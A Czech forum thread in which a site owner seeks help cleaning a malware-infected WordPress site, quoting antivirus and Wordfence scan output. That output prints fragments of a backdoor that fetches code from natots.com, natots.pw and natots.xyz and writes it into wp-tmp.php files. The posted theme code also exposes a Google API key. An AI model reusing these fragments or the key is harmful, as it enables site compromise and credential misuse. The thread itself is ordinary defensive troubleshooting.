Prodej projektu Duchod.cz - cena 550 tis Kč. Dále MojeFinance.cz, DuchodovaReforma.cz
Zobrazují se odpovědi 1 až 16 z 16

Wordpress - Antivirus ukazuje virus ve function.php, tam jsem, ale vše promazal.

  1. Pročistil jsem functions.php, ale stále mi ukazuje plugin Antivirus , že v šabloně ve functions php je něco , ale tam nic takového neni...

    Jinak mi asi prosím doporučte nejlepší postup na odvirování wordpresu. nejlepší plugin třeba....a tak.

    Tohle je functions.php


    Kód:
    <?php
    /**
     * Understrap functions and definitions
     *
     * @package understrap
     */
    
     function isa_add_img_title( $attr, $attachment = null ) {
    
        $img_title = trim( strip_tags( $attachment->post_title ) );
    
        $attr['title'] = $img_title;
        $attr['alt'] = $img_title;
    
        return $attr;
    }
    add_filter( 'wp_get_attachment_image_attributes','isa_add_img_title', 10, 2 );
    
    
    
    
    /**
     * Initialize theme default settings
     */
    require get_template_directory() . '/inc/theme-settings.php';
    
    /**
     * Theme setup and custom theme supports.
     */
    require get_template_directory() . '/inc/setup.php';
    
    /**
     * Register widget area.
     */
    require get_template_directory() . '/inc/widgets.php';
    
    /**
     * Enqueue scripts and styles.
     */
    require get_template_directory() . '/inc/enqueue.php';
    
    /**
     * Custom template tags for this theme.
     */
    require get_template_directory() . '/inc/template-tags.php';
    
    /**
     * Custom pagination for this theme.
     */
    require get_template_directory() . '/inc/pagination.php';
    
    /**
     * Custom functions that act independently of the theme templates.
     */
    require get_template_directory() . '/inc/extras.php';
    
    /**
     * Customizer additions.
     */
    require get_template_directory() . '/inc/customizer.php';
    
    /**
     * Custom Comments file.
     */
    require get_template_directory() . '/inc/custom-comments.php';
    
    /**
     * Load Jetpack compatibility file.
     */
    require get_template_directory() . '/inc/jetpack.php';
    
    /**
     * Load custom WordPress nav walker.
     */
    require get_template_directory() . '/inc/bootstrap-wp-navwalker.php';
    
    /**
     * Load WooCommerce functions.
     */
    require get_template_directory() . '/inc/woocommerce.php';
    
    /**
     * Load Editor functions.
     */
    require get_template_directory() . '/inc/editor.php';
    
    
    
    
      
    function my_acf_init() {
    	
    	acf_update_setting('google_api_key', 'AIzaSyAwqSoFkZfM3C8CXKFAK-0s-QOxcM74oJA');
    }
    
    add_action('acf/init', 'my_acf_init'); 
    
    
    
    
     
    // remove dashicons in frontend to non-admin 
        function wpdocs_dequeue_dashicon() {
            if (current_user_can( 'update_core' )) {
                return;
            }
            wp_deregister_style('dashicons');
        }
        add_action( 'wp_enqueue_scripts', 'wpdocs_dequeue_dashicon' );




    Zpráva pluginu antivir:

    /themes/understrap/functions.php

    This is not a virus
    if ($file = @file_get_contents(__FILE__))

    This is not a virus
    @file_put_contents(__FILE__, $file);

    This is not a virus
    if ($file = @file_get_contents(__FILE__))

    This is not a virus
    @file_put_contents(__FILE__, $file);

    This is not a virus
    $ch = curl_init();

    This is not a virus
    $data = curl_exec($ch);

    This is not a virus
    $handle = fopen($tmpfname, "w+");

    This is not a virus
    $handle = fopen($tmpfname, "w+");

    This is not a virus
    fclose($handle);

    This is not a virus
    if (($tmpcontent = @file_get_contents("http://www.natots.com/code.php") OR $tmp ...

    This is not a virus
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...

    This is not a virus
    @file_put_contents(get_template_directory() . '/wp-tmp.php', ...

    This is not a virus
    @file_put_contents('wp-tmp.php', $tmpcontent);

    This is not a virus
    elseif ($tmpcontent = @file_get_contents("http://www.natots.pw/code.php") AND str ...

    This is not a virus
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...

    This is not a virus
    @file_put_contents(get_template_directory() . '/wp-tmp.php', ...

    This is not a virus
    @file_put_contents('wp-tmp.php', $tmpcontent);

    This is not a virus
    elseif ($tmpcontent = @file_get_contents("http://www.natots.xyz/code.php") AND st ...

    This is not a virus
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...

    This is not a virus
    @file_put_contents(get_template_directory() . '/wp-tmp.php', ...

    This is not a virus
    @file_put_contents('wp-tmp.php', $tmpcontent);

    This is not a virus
    elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND s ...

    This is not a virus
    } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') ...

    This is not a virus
    } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $w ...

  2. Co se právě děje na Webtrhu?
    TerezkaM poptává: Úprava prestashopu 1.7
    Tomo2495 poptává: Hľadám php developera - remote
    Daniel Šalé poptává: Programátor PHP, dlouhodobá spolupráce
  3. Zkus toto - https://wordpress.org/plugins/wordfence/ .. pomohl zatím všude, kde něco bylo.

    Občas tyhle věci hazí false positive.

    ---------- Post added 30.03.2019 at 11:43 ----------

    btw ten kód není normální, z understrap/functions.php, smazat

  4. Ten kod jsem nenašel, ale byl tam nějakej balast a ten jsem smazal

    a udělal jsem scan na wordfence....

    File appears to be malicious: wp-content/themes/understrap/functions.php
    Type: File
    Issue Found 30. 3. 2019 12:38
    Critical
    Repair
    Ignore

    Details

    Need help with a hacked website?

    Our team of security experts will clean the infection and remove malicious content. Once your site is restored we will provide a detailed report of our findings. Includes a 1-year Wordfence Premium license.

    File appears to be malicious: wp-content/plugins/search-filter-pro/admin/class-search-filter-admin.php
    Type: File
    Issue Found 30. 3. 2019 12:38
    Critical
    Ignore

    Details

    File appears to be malicious: wp-includes/post.php
    Type: File
    Issue Found 30. 3. 2019 12:38
    Critical
    Repair
    Ignore

    Details

    File appears to be malicious: wp-includes/wp-vcd.php
    Type: File
    Issue Found 30. 3. 2019 12:38
    Critical
    Ignore

    Details

    File appears to be malicious: wp-includes/wp-tmp.php
    Type: File
    Issue Found 30. 3. 2019 12:38
    Critical
    Ignore

    Details

    WordPress core file modified: wp-includes/general-template.php
    Type: File
    Issue Found 30. 3. 2019 12:33
    High
    Repair
    Ignore

    Details

    WordPress core file modified: wp-includes/post.php
    Type: File
    Issue Found 30. 3. 2019 12:33
    High
    Repair
    Ignore

    Details

    Unknown file in WordPress core: wp-includes/wp-feed.php
    Type: File
    Issue Found 30. 3. 2019 12:33
    High
    Ignore

    Details

    Unknown file in WordPress core: wp-includes/wp-tmp.php
    Type: File
    Issue Found 30. 3. 2019 12:33
    High
    Ignore

    Details

    Unknown file in WordPress core: wp-includes/wp-vcd.php
    Type: File
    Issue Found 30. 3. 2019 12:33
    Hig

  5. To chce pročistit někým, kdo tomu rozumí.

  6. Citace Původně odeslal PetrGargulák Zobrazit příspěvek
    Pročistil jsem functions.php, ale stále mi ukazuje plugin Antivirus , že v šabloně ve functions php je něco , ale tam nic takového neni...

    Jinak mi asi prosím doporučte nejlepší postup na odvirování wordpresu. nejlepší plugin třeba....a tak.

    Tohle je functions.php


    Kód:
    <?php
    /**
     * Understrap functions and definitions
     *
     * @package understrap
     */
    
     function isa_add_img_title( $attr, $attachment = null ) {
    
        $img_title = trim( strip_tags( $attachment->post_title ) );
    
        $attr['title'] = $img_title;
        $attr['alt'] = $img_title;
    
        return $attr;
    }
    add_filter( 'wp_get_attachment_image_attributes','isa_add_img_title', 10, 2 );
    
    
    
    
    /**
     * Initialize theme default settings
     */
    require get_template_directory() . '/inc/theme-settings.php';
    
    /**
     * Theme setup and custom theme supports.
     */
    require get_template_directory() . '/inc/setup.php';
    
    /**
     * Register widget area.
     */
    require get_template_directory() . '/inc/widgets.php';
    
    /**
     * Enqueue scripts and styles.
     */
    require get_template_directory() . '/inc/enqueue.php';
    
    /**
     * Custom template tags for this theme.
     */
    require get_template_directory() . '/inc/template-tags.php';
    
    /**
     * Custom pagination for this theme.
     */
    require get_template_directory() . '/inc/pagination.php';
    
    /**
     * Custom functions that act independently of the theme templates.
     */
    require get_template_directory() . '/inc/extras.php';
    
    /**
     * Customizer additions.
     */
    require get_template_directory() . '/inc/customizer.php';
    
    /**
     * Custom Comments file.
     */
    require get_template_directory() . '/inc/custom-comments.php';
    
    /**
     * Load Jetpack compatibility file.
     */
    require get_template_directory() . '/inc/jetpack.php';
    
    /**
     * Load custom WordPress nav walker.
     */
    require get_template_directory() . '/inc/bootstrap-wp-navwalker.php';
    
    /**
     * Load WooCommerce functions.
     */
    require get_template_directory() . '/inc/woocommerce.php';
    
    /**
     * Load Editor functions.
     */
    require get_template_directory() . '/inc/editor.php';
    
    
    
    
      
    function my_acf_init() {
    	
    	acf_update_setting('google_api_key', 'AIzaSyAwqSoFkZfM3C8CXKFAK-0s-QOxcM74oJA');
    }
    
    add_action('acf/init', 'my_acf_init'); 
    
    
    
    
     
    // remove dashicons in frontend to non-admin 
        function wpdocs_dequeue_dashicon() {
            if (current_user_can( 'update_core' )) {
                return;
            }
            wp_deregister_style('dashicons');
        }
        add_action( 'wp_enqueue_scripts', 'wpdocs_dequeue_dashicon' );




    Zpráva pluginu antivir:

    /themes/understrap/functions.php

    This is not a virus
    if ($file = @file_get_contents(__FILE__))

    This is not a virus
    @file_put_contents(__FILE__, $file);

    This is not a virus
    if ($file = @file_get_contents(__FILE__))

    This is not a virus
    @file_put_contents(__FILE__, $file);

    This is not a virus
    $ch = curl_init();

    This is not a virus
    $data = curl_exec($ch);

    This is not a virus
    $handle = fopen($tmpfname, "w+");

    This is not a virus
    $handle = fopen($tmpfname, "w+");

    This is not a virus
    fclose($handle);

    This is not a virus
    if (($tmpcontent = @file_get_contents("http://www.natots.com/code.php") OR $tmp ...

    This is not a virus
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...

    This is not a virus
    @file_put_contents(get_template_directory() . '/wp-tmp.php', ...

    This is not a virus
    @file_put_contents('wp-tmp.php', $tmpcontent);

    This is not a virus
    elseif ($tmpcontent = @file_get_contents("http://www.natots.pw/code.php") AND str ...

    This is not a virus
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...

    This is not a virus
    @file_put_contents(get_template_directory() . '/wp-tmp.php', ...

    This is not a virus
    @file_put_contents('wp-tmp.php', $tmpcontent);

    This is not a virus
    elseif ($tmpcontent = @file_get_contents("http://www.natots.xyz/code.php") AND st ...

    This is not a virus
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...

    This is not a virus
    @file_put_contents(get_template_directory() . '/wp-tmp.php', ...

    This is not a virus
    @file_put_contents('wp-tmp.php', $tmpcontent);

    This is not a virus
    elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND s ...

    This is not a virus
    } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') ...

    This is not a virus
    } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $w ...
    To není chyba pouze ve functions.

  7. A proč si neuděláš zálohu DB a nenahraješ čistou instalaci WP? Nebude to rychlejší?

  8. neni to jen o pluginu ale hlavne o znalostech

  9. Tak kdo chce , ať sem hodí cenu za kterou to dá nebo mě do zpráv jak kdo chce, poptávám zrychlení a odvirování wordpresu.

  10. Proč to budeš u někoho poptávat? Udělej zálohu DB a nahraj čistý WP ne?

  11. Citace Původně odeslal Wladass Zobrazit příspěvek
    Proč to budeš u někoho poptávat? Udělej zálohu DB a nahraj čistý WP ne?
    To bys musel vědět na jistotu, že db je čistá

    ---------- Post added 30.03.2019 at 18:45 ----------

    Nemluvě o faktu, že wp-content nemůžeš jen tak smazat.

  12. Nejsem si úplně jistý, ale neznám způsob, přes který by šlo napadnout WP skrze nečistou db, jak udáváš.

  13. Citace Původně odeslal Wladass Zobrazit příspěvek
    Nejsem si úplně jistý, ale neznám způsob, přes který by šlo napadnout WP skrze nečistou db, jak udáváš.
    Třeba tak, že v příspěvcich jsou js skripta, které dělají bordel. Nedávno jsem našel skript, který tvořil adminy (takže do nového wp se stejně dostanou) apd. To, že vyřešíš ftp neznamená, že vyřešíš db.

  14. Citace Původně odeslal Wladass Zobrazit příspěvek
    Nejsem si úplně jistý, ale neznám způsob, přes který by šlo napadnout WP skrze nečistou db, jak udáváš.
    To jsem si před x lety myslel také, než jsem se setkal s napadenou databází u phpbb.

  15. Citace Původně odeslal Tomve Zobrazit příspěvek
    Třeba tak, že v příspěvcich jsou js skripta, které dělají bordel. Nedávno jsem našel skript, který tvořil adminy (takže do nového wp se stejně dostanou) apd. To, že vyřešíš ftp neznamená, že vyřešíš db.
    Zajímavé, to jsem nevěděl. Dík za poznatek.

  16. Citace Původně odeslal Depotys Zobrazit příspěvek
    To jsem si před x lety myslel také, než jsem se setkal s napadenou databází u phpbb.
    Útočník si vytvořil uživatele s admin právy? :)

  17. [QUOTE=Wladass;1519680]A proč si neuděláš zálohu DB a nenahraješ čistou instalaci WP? Nebude to rychlejší?[/QUOT

    Nakonec jsem to udělal sám a ve wordfence je to čistý a vše správně funguje.

Hostujeme u Server powered by TELE3